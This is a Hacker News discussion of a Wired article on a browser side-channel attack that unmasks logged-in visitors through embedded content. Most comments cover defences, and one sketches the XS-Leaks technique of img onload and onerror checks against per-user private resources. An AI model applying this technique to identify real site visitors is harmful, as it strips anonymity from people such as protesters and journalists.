[HN Gopher] A new attack can unmask anonymous users on any major...
___________________________________________________________________
A new attack can unmask anonymous users on any major browser (2022)
Author : tysone
Score : 49 points
Date : 2023-06-02 19:16 UTC (3 hours ago)
(HTM) web link (www.wired.com)
(TXT) w3m dump (www.wired.com)
| j-bos wrote:
| Is this new? Seems like a long present low hanging fruit.
| omgmajk wrote:
| Article from 2022.
| saxonww wrote:
| Firefox container mode stops this. I can imagine a product that
| makes every tab an ephemeral container by default, and you had to
| explicitly opt-in to a container profile to share cookies, etc.
| cross-tab.
| pwgentleman wrote:
| Yeah there's an extension called Temporary containers that does
| exactly that (^:
| ravenstine wrote:
| Even better, type "about:profiles" into your URL bar, create a
| new profile that runs in an entirely separate Firefox process,
| and live your second life there.
| xjay wrote:
| Disable automatic updates in this case (Windows).
|
| When an update is applied between the first and second
| profile process, any new tab won't do anything in any of the
| instances. Firefox likely still doesn't detect this state.
|
| Edit: That is, if you use Firefox with two or more profiles,
| and may start one profile later (after a new update was
| published).
| Aachen wrote:
| If you're linked to something on twitter or discord or so, odds
| are that you'll open it in that container because that's the
| default behavior. While you're right, and I use containers as
| well, I'm not sure that's a solid way to prevent this attack
| unless the person can be convinced to diligently right click
| anything they wish to open, copy the link, and manually paste
| it in a fresh new tab.
| fsflover wrote:
| This is solved in Qubes OS by using separate VMs for
| different security domains. For Discord, a single click can
| be configured to open a browser in a dedicated disposable VM.
| Izkata wrote:
| Relevant paragraphs:
|
| > How this de-anonymization attack works is difficult to explain
| but relatively easy to grasp once you have the gist. Someone
| carrying out the attack needs a few things to get started: a
| website they control, a list of accounts tied to people they want
| to identify as having visited that site, and content posted to
| the platforms of the accounts on their target list that either
| allows the targeted accounts to view that content or blocks them
| from viewing it--the attack works both ways.
|
| > Next, the attacker embeds the aforementioned content on the
| malicious website. Then they wait to see who clicks. If anyone on
| the targeted list visits the site, the attackers will know who
| they are by analyzing which users can (or cannot) view the
| embedded content.
|
| > The attack takes advantage of a number of factors most people
| likely take for granted: Many major services--from YouTube to
| Dropbox--allow users to host media and embed it on a third-party
| website. Regular users typically have an account with these
| ubiquitous services and, crucially, they often stay logged into
| these platforms on their phones or computers.
|
| Isn't this one of the older forms of de-anonymization? And this
| is pretty visible to the user too, embeds hint to even non-
| technical people they can be tracked across websites.
| Aachen wrote:
| > And this is pretty visible to the user too
|
| How would even a tech savvy person know of this going on in the
| background, without being suspicious a priori? Embedded frames
| can be made invisible, overlaid with something else, or put
| off-screen. You'd have to be very familiar with this attacker's
| site to know that it's unusually slow today and loading longer
| than usual, or showing it's loading while the page appears to
| be already fully loaded. With the gigabytes of javascript that
| are common nowadays, that's not unusual.
|
| The riskiest part is probably the sharing, as email
| notifications of such actions are commonly sent out.
| Izkata wrote:
| Embeds in general can lead to this suspicion, not the attack
| itself. I've seen people question "why am I logged in to
| these Facebook comments? Does Facebook know I visited this
| site?", which then leads to them discovering recommendations
| that others have commented on here. They don't even need to
| know anything technical beyond "install this addon to stop
| Facebook from spying on you" and poof, this attack doesn't
| work anymore.
| ls612 wrote:
| I'd also assume that ublockorigin will stop most of this in
| its tracks.
| Aachen wrote:
| TL;DR (the crucial info is, predictably, at the very end): share
| a picture with someone via dropbox or whatever and embed that
| dropbox page on a website you control, then "analyze accessible
| information about the target's browser and the behavior of their
| processor as the request is happening to make an inference about
| whether the content request was allowed or denied."
|
| So you can confirm via unspecified vectors whether a visitor is
| among a specific set of persons if they are logged in with the
| right user account. (Not exactly a way to unmask any anonymous
| user on any major platform, the way the headline sounds.)
|
| Edit: oh, it's not at the very end. Beyond the horizontal line
| and newsletter begging there's a few more paragraphs I didn't see
| before. Credit where it's due, they didn't bury it at the end
| but, instead, only 988 words stand between you and the above
| information!
| Blahah wrote:
| https://archive.is/neUxt
| Izkata wrote:
| Oh haha this might be an attack itself:
|
| > The researchers developed a browser extension that can thwart
| such attacks, and it is available for Chrome and Firefox. But
| they note that it may impact performance and isn't available for
| all browsers.
|
| And if you click through to the Firefox one...
|
| > This add-on is not actively monitored for security by Mozilla.
| Make sure you trust it before installing.
| JBiserkov wrote:
| The target demographic selects itself ;-)
| notjulianjaynes wrote:
| I am pretty sure that how it works is almost every Firefox add
| on that isn't in their recommended add ons has this warning.
| Izkata wrote:
| As far as I know they can get it reviewed without reaching
| "recommended" status. My point is these are security
| researchers that didn't bother getting it reviewed. Surely
| they'd go through the effort to get it reviewed if they
| really wanted to convince people it was safe, right? Seems to
| imply to me there's something that would get it removed if
| Mozilla did review it.
|
| Edit: I guess maybe reviewed and recommended are the same (I
| swear they were different at one point), but there is an
| email you can send to suggest extensions to reach this
| status.
| kodah wrote:
| > "If you're an average internet user, you may not think too much
| about your privacy when you visit a random website," says Reza
| Curtmola, one of the study authors and a computer science
| professor at NJIT. "But there are certain categories of internet
| users who may be more significantly impacted by this, like people
| who organize and participate in political protest, journalists,
| and people who network with fellow members of their minority
| group."
|
| I get so dizzied by statements like this. It's almost as if
| researchers want to undermine their own work. Privacy can be
| _essential_ for certain groups, but it should be a priority for
| everyone. Frankly I 'm not even sure the statement about minority
| groups is true anymore. We've seen unmasking used by
| corporations, interest groups, governments, etc against a wide
| variety of people with dangerous outcomes.
|
| I'd prefer we refactor messaging to make people realize that this
| is important to everyone and that we lay an impotus to do
| something about it, especially as governments all over the world
| are moving to eliminate personal and online privacy.
| therealcyclist wrote:
| [flagged]
| Sunspark wrote:
| Combined with AI/ML this would be useful for PaaS to provide a
| curated offering of porn, except for those from Louisiana.
| green_boons wrote:
| There was a similar attack from a couple years ago that checked
| if favicons for sites were cached and then polled them
| lelandfe wrote:
| It's a classic problem. It's also why :visited was limited, why
| caches were partitioned, etc.
| throwawayadvsec wrote:
| wouldn't that be stopped by CORS blocking which is pretty much
| the norm for large websites?
| lincolnq wrote:
| Iframes bypass CORS, so the trick is to use an Iframe and
| figure out (using some side channel since you can't peek into
| the frame) whether the iframe loaded the content successfully
| or whether it loaded an error page.
| veeberz wrote:
| There's a type of side-channel attack you can do to get around
| CORS but still leak limited information.
|
| Suppose you want to detect whether one of N pre-chosen users of
| FakeMail (a service I made up) have visited a malicious page
| you control. Let's also say that in FakeMail:
|
| 1. you can see a hi-res version of your profile pic only if
| you're authenticated
|
| 2. only you can see your own hi-res profile pic
|
| 3. the path to this private pic is unique to each user, e.g.
| `/users/{user_id}/private_pic`
|
| The trick then is to embed an `<img>` tag with a `src` to this
| private, hi-res profile pic for each of the N pre-chosen
| targets in your malicious page. Then, in `onerror` and `onload`
| event handlers of `img`, you can implement logic to handle
| "user X is not here" and "user X is here" respectively.
|
| Of course, this attack could be thwarted by SameSite cookies or
| browsers with protection against cross-site use of cookies. And
| it's rather hard to find FakeMail's exact three conditions
| needed to pull off such an attack. AND just add one more, your
| targets have to be authenticated to FakeMail. It might seem
| like an attack that's not viable, but this has happened before,
| and iirc it was called XS-Leaks for a while when I first heard
| of it.
| Semaphor wrote:
| Seems like anyone using a third party content blocker like
| uMatrix will be immune.
| myshpa wrote:
| uMatrix is a lifesaver ... I enable only css, images and media
| for 1st party sites, everything else is disabled by default.
|
| Have not seen an ad in years.
___________________________________________________________________
(page generated 2023-06-02 23:00 UTC)